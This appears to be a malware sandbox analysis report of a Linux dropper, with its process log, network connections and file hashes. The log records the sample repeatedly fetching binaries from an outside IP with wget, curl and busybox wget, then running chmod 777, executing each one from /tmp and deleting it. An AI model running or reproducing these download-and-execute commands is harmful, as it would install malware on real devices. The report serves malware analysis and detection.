[wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/bin/chmod

[chmod 777 T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C

[./T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/bin/rm

[rm T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/usr/bin/wget

[wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/bin/chmod

[chmod 777 DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs

[./DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/bin/rm

[rm DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/usr/bin/wget

[wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/bin/chmod

[chmod 777 LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE

[./LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/bin/rm

[rm LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/usr/bin/wget

[wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/bin/chmod

[chmod 777 ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe

[./ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/bin/rm

[rm ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/usr/bin/wget

[wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/bin/chmod

[chmod 777 giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw

[./giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/bin/rm

[rm giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/usr/bin/wget

[wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/bin/chmod

[chmod 777 KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp

[./KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/bin/rm

[rm KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/usr/bin/wget

[wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/bin/chmod

[chmod 777 EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK

[./EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/bin/rm

[rm EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/usr/bin/wget

[wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/bin/chmod

[chmod 777 FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy

[./FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/bin/rm

[rm FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/usr/bin/wget

[wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/bin/chmod

[chmod 777 KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X

[./KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/bin/rm

[rm KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/usr/bin/wget

[wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/bin/chmod

[chmod 777 hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR

[./hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/bin/rm

[rm hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/usr/bin/wget

[wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/bin/chmod

[chmod 777 rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b

[./rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/bin/rm

[rm rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/usr/bin/wget

[wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/bin/chmod

[chmod 777 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w

[./6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/bin/rm

[rm 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/usr/bin/wget

[wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/bin/chmod

[chmod 777 xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda

[./xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/bin/rm

[rm xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97